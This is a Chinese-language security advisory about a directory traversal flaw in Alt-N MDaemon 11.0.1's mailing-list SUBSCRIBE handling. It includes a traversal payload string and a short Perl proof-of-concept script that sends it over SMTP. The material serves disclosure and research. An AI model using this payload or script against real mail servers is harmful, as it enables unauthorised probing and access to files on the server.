MDaemon邮件列表订阅目录遍历漏洞
发布日期:2010-04-30
更新日期:2010-05-04
受影响系统:Alt-N MDaemon 11.0.1
描述:
BUGTRAQ ID:
39857
Alt-N MDaemon是一款基于Windows的邮件服务程序,WorldClient是其客户端。
MDaemon支持邮件列表功能。在配置邮件列表时,MDaemon会将邮件列表的配置存储在<MDaemonDir>(通常为C:\MDaemon)\App目录下扩展名为grp的文件中,邮件列表组文件大致为:
---snip---
# Mailing List file
#
; ListName = test@company.mail
; Private = N
; HideFromAddressBook = N
; AllowExpn = Y
; ListNameInSubject = Y
...
---snip---
在订阅邮件列表时,用户发送带有以下标题的邮件:
SUBSCRIBE test-mailinglist@<domainhere>
这时会在C:\MDaemon\App\目录中搜索名为
test-mailinglist@domain.grp的grp的文件。攻击者可以提供目录遍历序列指向到其他的文件,例如:
SUBSCRIBE VVV@"../../../../../../../../../../../../../../../../../users/kcope/openshare/foobar
在这种情况下MDaemon会在C:\Users\Kcope\OpenShare\foobar.grp下查找grp文件。如果存在,MDaemon就会使用这个文件并返回确认信。
<*来源:Kingcope (
kingcope@gmx.net)
链接:
http://secunia.com/advisories/39672/
http://marc.info/?l=full-disclosure&m=127281620308385&w=2
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
---snip---
use IO::Socket::INET;
use MIME::Base64;
$|=1;
$sock = IO::Socket::INET->new(PeerAddr => 'localhost',
PeerPort => '25',
Proto => 'tcp');
print $sock "EHLO you\r\n";
print $sock "MAIL FROM: <niko>\r\n";
print $sock "RCPT TO: <MDaemon\@company.mail>\r\n";
print $sock "DATA\r\n";
print $sock "Date: 23 Oct 81 11:22:33\r\n";
print $sock "From: <niko>\r\n";
print $sock "To: <MDaemon\@company.mail>\r\n";
print $sock "Subject: SUBSCRIBE
VVV\@\"../../../../../../../../../../../../../../../../../users/kcope/openshare/foobar\r\n";
print $sock "\r\n\r\ntest\r\n.\r\nQUIT\r\n";
print ".";
while(<$sock>) {
print;
}
---snip---
建议:
厂商补丁:
Alt-N
-----
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://www.altn.com浏览次数:2703
严重程度:0(网友投票)
